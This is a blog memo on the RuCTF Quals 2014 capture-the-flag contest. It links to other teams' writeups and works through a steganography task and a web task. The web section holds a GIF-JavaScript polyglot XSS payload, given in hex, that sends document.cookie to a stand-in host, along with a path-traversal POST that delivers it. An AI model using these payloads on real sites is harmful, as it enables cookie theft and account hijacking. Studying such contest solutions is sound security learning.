RuCTF Quals 2014 memo

First published Wed Mar 26 04:19:47 2014 +0900 ; substantive revision Sat Feb 14 12:41:39 2015 +0900

Tags : Security CTF

I participated in RuCTF Quals 2014 on the team “0x0” with @nash_fs, @superbacker, @waidotto and @wasao. Our final standing is 38th. Thanks to the RuCTF devteam for hosting the exciting CTF and long-lived afterpatry :) I really like CTFs with recons, for the human being is obviously one of the biggest “security holes”. I picked up some of the problems most interesting to me.

admin 100 iip

• A writeup by h34dump http://h34dump.com/2014/03/ructf-quals-2014-admin-100/
• I2P Anonymous Network http://geti2p.net/en/

admin 200 Troubleshooting

I managed to solve the problem in the way similar to Lights Out CTF’s writeup. I should learn about the network configuration for better understanding…

crypto 100 MD5

• A writeup by @waidotto http://d.hatena.ne.jp/waidotto/20140310/1394475916

crypto 200 Mary Queen

The file given was a text encoded in GB 18030.

• A writeup by QUANGNTENEMY http://quangntenemy.blogspot.com/2014/03/ructf-quals-2014.html
• SCBSolvr http://www.secretcodebreaker.com/scbsolvr.html

crypto 500 Decrypt Message

• A writeup by cth http://w84thesun.com/forum/showthread.php?tid=30&pid=88

forensics 100 Secret host

• A writeup by adithya naresh http://ctfwriteups.blogspot.jp/2014/03/ructf-2014-quals-forensics-100-secret.html

forensics 200 Nosql

After a short googling I found out that the data was a set of MongoDB database files. I tried mongod --repair but ended up with no success.

• A writeup by h34dump http://h34dump.com/2014/03/ructf-quals-2014-forensics-200/
• purplebeard https://github.com/MongoHQ/purplebeard

recon 200 Stolen camera

Similar solutions:

• A writeup by Rex http://xrekkusu.hatenablog.jp/entry/2014/03/11/143840
• A writeup by Singularity http://singularityctf.blogspot.jp/2014/03/ructf-quals-2014-writeup-recon-200_19.html
• A writeup by h34dump http://h34dump.com/2014/03/ructf-quals-2014-recon-200/

But I’m impressed by stypr’s one! http://logic.stypr.com/ctf/2014/RuCTF_solutions.zip

recon 500 The card

• A writeup by Singularity http://singularityctf.blogspot.jp/2014/03/ructf-quals-2014-writeup-recon-500-card_19.html

stegano 100 Cat’s eye

An 8-frame animated gif was given. At first we split them all with ImageMagick for better investigation.

convert +adjoin <input animated gif> <output file name prefix>

Let’s take diffs of each succesive frame with ImageMagick.

composite -compose Difference <n.gif> <n+1.gif>

We find some dots in resulting images.

Combining them all with ImageMagick,

convert <input image files> -background transparent -flatten output.png

we get an image with suggestive dots.

It seems to be a kind of binary expression. Sadly, no more ImageMagick. With Stegpy to decode it instantly,

$ python stegpy.py output.png -x -rm 1 -p lrud -o r<enter>
$ RUCTF_e4dd9f5cee307b322c3a27abe66e3df9%

web 300 Messengerrr

During the competiton, my teammate found out that there was a (pseudo) XSS vulnerability with uploaded images.

So, the task is to make an image-JavaScript polyglot. In order to avoid some errors by invalid characters when the image interpreted as JavaScript, we make the payload in GIF format, because GIF binary starts with the clearly valid ASCII string GIF89a (474946383961).

The simplest and common way to make a GIF-JavaScript polyglot is set the width section of GIF to /* (2f2a) so that you can comment out the data section of GIF when it is interpreted as JavaScript. However, the target web service has a limitation in the size of the image to upload. Since 2f2a in decimal is 10799 of pixels, the payload image is too large in width to pass the limitation.

All sorts of solutions were discovered:

• http://lights-out-ctf.ghost.io/ructf-2014-quals-web-300-messengerrr-in-english/
• http://mage-ctf-writeup.blogspot.jp/2014/03/ructf-quals-2014-web300.html

My solution was setting the first 3 bytes of the width section plus the heght one to =\x0a" (3d0a22). I downloaded a 1x1 pixel GIF image and modified it as follows.

0000: 4749 4638 3961 3d0a 2200 8000 0000 0000 ffff ff21 f904 0100 0000 002c 0000 0000  GIF89a=."..........!.......,....
0020: 0100 0100 4002 0144 0022 3b0a 6c6f 6361 7469 6f6e 2e68 7265 663d 2268 7474 703a  ....@..D.";.location.href="http:
0040: 2f2f 7777 772e 6578 616d 706c 652e 636f 6d2f 3f63 6f6f 6b69 653d 222b 646f 6375  //www.example.com/?cookie="+docu
0060: 6d65 6e74 2e63 6f6f 6b69 653b                                                    ment.cookie;

Sending a message to yourself with the payload image, you can get the URL the image uploaded by browsing it. Let’s send another to the victim with the modified theme param. (don’t forget to set up any request logger on your server before that)

POST /savemsg HTTP/1.1


[...]


to=d69e5ccddeed4c2a85fceea286e521fe&subject=&text=&theme=../../../upload/<your id>/payload.gif%23&img=

You’ll receive the following request on your server.

GET /?cookie=secureid=<your secureid>%20flag=RUCTF_48e0945be711468e8cf17164957aeb33 HTTP/1.1

[...]